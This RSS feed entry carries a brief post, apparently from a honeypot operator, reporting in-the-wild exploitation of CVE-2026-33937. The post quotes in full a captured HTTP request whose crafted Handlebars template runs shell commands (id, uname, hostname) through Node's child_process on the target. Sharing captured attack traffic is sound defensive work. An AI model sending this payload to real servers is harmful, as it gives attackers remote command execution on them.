<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Seeing exploitation of CVE-2026-33937 but they target the example URI (&#x2F;api&#x2F;email&#x2F;preview) that is only present in the writeup at https:&#x2F;&#x2F;github.com&#x2F;EQSTLab&#x2F;CVE-2026-33937]]></title><description><![CDATA[<p>Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at <a href="https://github.com/EQSTLab/CVE-2026-33937" rel="nofollow noopener"><span>https://</span><span>github.com/EQSTLab/CVE-2026-33</span><span>937</span></a> </p><p>Here is a full request:</p><p>POST /api/email/preview HTTP/1.1<br />Host: x.x.x.x:8080<br />Connection: close<br />Content-Length: 585<br />Content-Type: application/json<br />User-Agent: Go-http-client/1.1</p><p>{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}</p><p><a href="https://infosec.exchange/tags/dfir" rel="tag">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/honeypot" rel="tag">#<span>honeypot</span></a> <a href="https://infosec.exchange/tags/infosec" rel="tag">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybersecurity" rel="tag">#<span>cybersecurity</span></a></p>]]></description><link>https://board.circlewithadot.net/topic/4983d0bd-c033-4f26-bfe7-3b7c7fcc0a57/seeing-exploitation-of-cve-2026-33937-but-they-target-the-example-uri-api-email-preview-that-is-only-present-in-the-writeup-at-https-github.com-eqstlab-cve-2026-33937</link><generator>RSS for Node</generator><lastBuildDate>Mon, 25 May 2026 07:19:02 GMT</lastBuildDate><atom:link href="https://board.circlewithadot.net/topic/4983d0bd-c033-4f26-bfe7-3b7c7fcc0a57.rss" rel="self" type="application/rss+xml"/><pubDate>Tue, 05 May 2026 17:57:09 GMT</pubDate><ttl>60</ttl></channel></rss>